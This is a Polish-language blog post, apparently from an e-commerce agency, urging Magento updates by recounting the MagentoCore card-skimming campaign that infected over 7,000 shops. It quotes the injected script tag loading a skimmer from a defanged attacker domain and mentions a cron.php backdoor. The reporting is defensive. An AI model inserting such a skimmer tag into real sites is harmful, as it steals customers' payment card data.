Dlaczego aktualizacja Magento jest tak istotna?

koniec wsparcia akeneo 4.0 i nowości w wersji 5.0

W przeciągu pół roku przestępcy umieścili szkodliwe skrypty na ponad 7 tysiącach sklepów opartych o silnik Magento. W wyniku tego procederu hakerzy kradli dane kart płatniczych klientów, zyskując dostęp do pieniędzy na kontach bankowych.

Według eksperta Willema de Groota, który odkrył zagrożenie jest to najbardziej agresywny skrypt tego typu powstały do tej pory w przypadku Magento. Hakerzy zainfekowali już 7 339 sklepów Magento skimerem o nazwie MagentoCore, który pobiera dane z kart płatniczych od użytkowników, którzy kupili na tych stronach. Szkodliwy skrypt ładuje się na strony kasowe sklepu i kradnie dane karty płatniczej dostarczone przez użytkowników i wysyła je na serwer kontrolowany przez atakującego. Willem de Groot poinformował, że kampania hakerska obejmuje skimmer skrypt załadowany z domeny magentocore.net.

Kampania wciąż trwa, a hakerzy atakują nowe sklepy Magento w tempie od 50 do 60 stron dziennie. Wśród zainfekowanych sklepów są również firmy notowane na giełdzie obracające milionowymi kwotami. 1450 spośród ponad 7339 zainfekowanych sklepów opartych o platformę Magento miało przez pół roku w kodzie umieszczony szkodliwy skrypt. W tym czasie zaatakowane serwisy nie zareagowały na wyciek danych. Reszcie sklepów zajmowało to średnio kilka tygodni.

Gdy atakującemu uda się złamać kod strony dodaje do szablonu HTML osadzony fragment kodu JavaScript:

<script type=”text/javascript” src=”hxxps://magentocore.net/mage/mage.js”></script>

Skrypt ma za zadanie rejestrować składanie zamówień przez klientów i wysyła je na serwer „magentocore.net”. Złośliwe oprogramowanie dodaje backdoor do cron.php, który będzie okresowo pobierał szkodliwy kod, a po uruchomieniu usuwał się sam. Według Bleeping Computer, w którym cytowany jest Yonathan Klijnsma, Badacz ds. Zagrożenia dla RiskIQ, kampania MagentoCore jest częścią większej kampanii kradzieży kart zwanej MageCart, która była aktywna od końca 2015 roku.

Według de Groota, obecnie 4,2% wszystkich sklepów Magento jest zainfekowanych jednym lub większą liczbą skimmerów.

Napisz do nas

Masz pytanie?

Napisz do nas

Pole jest błędnie wypełnione. Sprawdź wpisaną treść i spróbuj ponownie.
Pole jest błędnie wypełnione. Sprawdź wpisaną treść i spróbuj ponownie.
Pole jest błędnie wypełnione. Sprawdź wpisaną treść i spróbuj ponownie.
Pole jest błędnie wypełnione. Sprawdź wpisaną treść i spróbuj ponownie.
Wyrażenie zgody jest niezbędne.

PDF, DOC, DOCX, JPG lub PNG (max 5MB)

Przynajmniej jedno pole jest błędnie wypełnione. Sprawdź wpisaną treść i spróbuj ponownie.
Andrzej

Andrzej Szylar

Chief Executive Officer

Magdalena Paczyńska

HR Manager

Krystian Niedźwiecki

Marketing Manager